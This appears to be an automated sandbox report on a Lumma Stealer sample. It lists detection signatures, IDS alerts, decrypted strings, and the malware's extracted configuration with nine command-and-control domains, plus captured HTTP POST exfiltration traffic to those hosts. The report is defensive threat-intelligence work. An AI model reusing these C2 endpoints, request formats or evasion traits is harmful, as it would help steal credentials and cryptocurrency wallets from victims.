Windows Analysis Report
8ZVMneG.exe

Overview

General Information

Sample name: 8ZVMneG.exe
Analysis ID: 1578702
MD5: e8af4d0d0b47ac68d762b7f288ae8e6e
SHA1: 1d65f31526cc20ab41d6b1625d6674d7f13e326c
SHA256: b83449768e7af68867c8bc42b19ff012722d88ea66aef69df48661e63e0eb15e
Tags: exe, user-lontze7

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 8ZVMneG.exe (PID: 6672 cmdline: "C:\Users\user\Desktop\8ZVMneG.exe" MD5: E8AF4D0D0B47AC68D762B7F288AE8E6E)
    • conhost.exe (PID: 1916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 8ZVMneG.exe (PID: 2144 cmdline: "C:\Users\user\Desktop\8ZVMneG.exe" MD5: E8AF4D0D0B47AC68D762B7F288AE8E6E)
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["debonairnukk.xyz", "sordid-snaked.cyou", "awake-weaves.cyou", "deafeninggeh.biz", "wrathful-jammy.cyou", "bellflamre.click", "effecterectz.xyz", "immureprech.biz", "diffuculttan.xyz"], "Build id": "LPnhqo--nbgnxdlxdnyo"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author | Strings
Process Memory Space: 8ZVMneG.exe PID: 2144 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: 8ZVMneG.exe PID: 2144 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: 8ZVMneG.exe PID: 2144 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-20T07:04:04.762697+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49708 | 178.62.201.34 | 443 | TCP
2024-12-20T07:04:08.073287+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49710 | 178.62.201.34 | 443 | TCP
2024-12-20T07:04:11.747273+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49721 | 23.55.153.106 | 443 | TCP
2024-12-20T07:04:14.477255+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49730 | 104.21.66.86 | 443 | TCP
2024-12-20T07:04:16.977941+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49737 | 104.21.66.86 | 443 | TCP
2024-12-20T07:04:20.251562+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49748 | 104.21.66.86 | 443 | TCP
2024-12-20T07:04:22.408919+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49754 | 104.21.66.86 | 443 | TCP
2024-12-20T07:04:24.648073+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49760 | 104.21.66.86 | 443 | TCP
2024-12-20T07:04:27.199008+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49765 | 104.21.66.86 | 443 | TCP
2024-12-20T07:04:29.656807+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49771 | 104.21.66.86 | 443 | TCP
2024-12-20T07:04:33.207297+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49781 | 104.21.66.86 | 443 | TCP

2024-12-20T07:04:05.330048+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49708 | 178.62.201.34 | 443 | TCP
2024-12-20T07:04:08.643870+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49710 | 178.62.201.34 | 443 | TCP
2024-12-20T07:04:15.538055+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49730 | 104.21.66.86 | 443 | TCP
2024-12-20T07:04:17.761204+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49737 | 104.21.66.86 | 443 | TCP
2024-12-20T07:04:33.968807+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49781 | 104.21.66.86 | 443 | TCP

2024-12-20T07:04:05.330048+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49708 | 178.62.201.34 | 443 | TCP
2024-12-20T07:04:08.643870+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49710 | 178.62.201.34 | 443 | TCP
2024-12-20T07:04:15.538055+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49730 | 104.21.66.86 | 443 | TCP

2024-12-20T07:04:17.761204+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.6 | 49737 | 104.21.66.86 | 443 | TCP

2024-12-20T07:04:08.073287+0100 | 2058215 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49710 | 178.62.201.34 | 443 | TCP

2024-12-20T07:04:04.762697+0100 | 2058223 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49708 | 178.62.201.34 | 443 | TCP

2024-12-20T07:04:09.691347+0100 | 2058210 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 55633 | 1.1.1.1 | 53 | UDP

2024-12-20T07:04:01.704512+0100 | 2058212 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 64563 | 1.1.1.1 | 53 | UDP

2024-12-20T07:04:05.333755+0100 | 2058214 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 51110 | 1.1.1.1 | 53 | UDP
2024-12-20T07:04:06.343594+0100 | 2058214 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 51110 | 1.1.1.1 | 53 | UDP

2024-12-20T07:04:09.249702+0100 | 2058216 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 61345 | 1.1.1.1 | 53 | UDP

2024-12-20T07:04:09.024667+0100 | 2058218 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49664 | 1.1.1.1 | 53 | UDP

2024-12-20T07:04:08.719711+0100 | 2058220 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 59800 | 1.1.1.1 | 53 | UDP

2024-12-20T07:04:02.024946+0100 | 2058222 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 58022 | 1.1.1.1 | 53 | UDP
2024-12-20T07:04:03.018352+0100 | 2058222 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 58022 | 1.1.1.1 | 53 | UDP

2024-12-20T07:04:09.910772+0100 | 2058226 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 54862 | 1.1.1.1 | 53 | UDP

2024-12-20T07:04:09.472443+0100 | 2058236 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 61530 | 1.1.1.1 | 53 | UDP

2024-12-20T07:04:27.960398+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49765 | 104.21.66.86 | 443 | TCP

2024-12-20T07:04:04.765168+0100 | 2822521 | 1 | Domain Observed Used for C2 Detected | 178.62.201.34 | 443 | 192.168.2.6 | 49708 | TCP
2024-12-20T07:04:08.074752+0100 | 2822521 | 1 | Domain Observed Used for C2 Detected | 178.62.201.34 | 443 | 192.168.2.6 | 49710 | TCP

2024-12-20T07:04:12.667635+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49721 | 23.55.153.106 | 443 | TCP


              AV Detection

Source: 00000000.00000002.2160722353.0000000002A73000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["debonairnukk.xyz", "sordid-snaked.cyou", "awake-weaves.cyou", "deafeninggeh.biz", "wrathful-jammy.cyou", "bellflamre.click", "effecterectz.xyz", "immureprech.biz", "diffuculttan.xyz"], "Build id": "LPnhqo--nbgnxdlxdnyo"}
Source: 8ZVMneG.exe | Virustotal: Detection: 65%
Source: 8ZVMneG.exe | ReversingLabs: Detection: 71%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 94.5% probability
Source: 8ZVMneG.exe | Joe Sandbox ML: detected
Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: sordid-snaked.cyou
Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: awake-weaves.cyou
Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: wrathful-jammy.cyou
Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: debonairnukk.xyz
Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: diffuculttan.xyz
Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: effecterectz.xyz
Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: deafeninggeh.biz
Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: immureprech.biz
Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: bellflamre.click
Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: LPnhqo--nbgnxdlxdnyo
Source: 8ZVMneG.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 178.62.201.34:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 178.62.201.34:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49748 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49760 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49765 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49771 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49781 version: TLS 1.2
Source: 8ZVMneG.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: 0_2_00EDD2A7 FindFirstFileExW | 0_2_00EDD2A7
Source: C:\Users\user\Desktop\8ZVMneG.exe | Code function: 0_2_00EDD358 FindFirstFileExW, FindNextFileW, FindClose, FindClose | 0_2_00EDD358

              Networking

Source: Network traffic | Suricata IDS: 2058212 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bellflamre .click) : 192.168.2.6:64563 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.6:58022 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.6:51110 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.6:49708 -> 178.62.201.34:443
Source: Network traffic | Suricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.6:55633 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.6:54862 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 178.62.201.34:443 -> 192.168.2.6:49708
Source: Network traffic | Suricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.6:49710 -> 178.62.201.34:443
Source: Network traffic | Suricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 178.62.201.34:443 -> 192.168.2.6:49710
Source: Network traffic | Suricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.6:61530 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.6:59800 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.6:49664 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.6:61345 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49737 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49708 -> 178.62.201.34:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49710 -> 178.62.201.34:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49730 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49737 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49730 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49708 -> 178.62.201.34:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 178.62.201.34:443
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49721 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49781 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49765 -> 104.21.66.86:443
Source: Malware configuration extractor | URLs: debonairnukk.xyz
Source: Malware configuration extractor | URLs: sordid-snaked.cyou
Source: Malware configuration extractor | URLs: awake-weaves.cyou
Source: Malware configuration extractor | URLs: deafeninggeh.biz
Source: Malware configuration extractor | URLs: wrathful-jammy.cyou
Source: Malware configuration extractor | URLs: bellflamre.click
Source: Malware configuration extractor | URLs: effecterectz.xyz
Source: Malware configuration extractor | URLs: immureprech.biz
Source: Malware configuration extractor | URLs: diffuculttan.xyz
Source: DNS query: effecterectz.xyz
Source: DNS query: diffuculttan.xyz
Source: DNS query: debonairnukk.xyz
Source: Joe Sandbox View | IP Address: 104.21.66.86
Source: Joe Sandbox View | IP Address: 23.55.153.106
Source: Joe Sandbox View | IP Address: 178.62.201.34
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49708 -> 178.62.201.34:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 178.62.201.34:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49721 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49748 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49754 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49737 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49730 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49760 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49765 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49771 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49781 -> 104.21.66.86:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: immureprech.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: deafeninggeh.biz
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 54 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=C5PLJO8RR7LUD8CMHBI | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12872 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=UB6YY78GPNR7GMOC0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15106 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=ICQ9J4SUMK0W7VEBGUY | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 19976 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=1NBWOHGWMH0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1184 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=6DZ4WE0ATJK8ZM | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 587856 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 89 | Host: lev-tolstoi.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (13 occurrences)
Source: 8ZVMneG.exe, 00000003.00000003.2402934236.00000000013FC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: //www.youtube.com https://www.google.com equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: bellflamre.click
              Source: global trafficDNS traffic detected: DNS query: immureprech.biz
              Source: global trafficDNS traffic detected: DNS query: deafeninggeh.biz
              Source: global trafficDNS traffic detected: DNS query: effecterectz.xyz
              Source: global trafficDNS traffic detected: DNS query: diffuculttan.xyz
              Source: global trafficDNS traffic detected: DNS query: debonairnukk.xyz
              Source: global trafficDNS traffic detected: DNS query: wrathful-jammy.cyou
              Source: global trafficDNS traffic detected: DNS query: awake-weaves.cyou
              Source: global trafficDNS traffic detected: DNS query: sordid-snaked.cyou
              Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
              Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
              Source: 8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: 8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: 8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: 8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: 8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: 8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: 8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: 8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: 8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
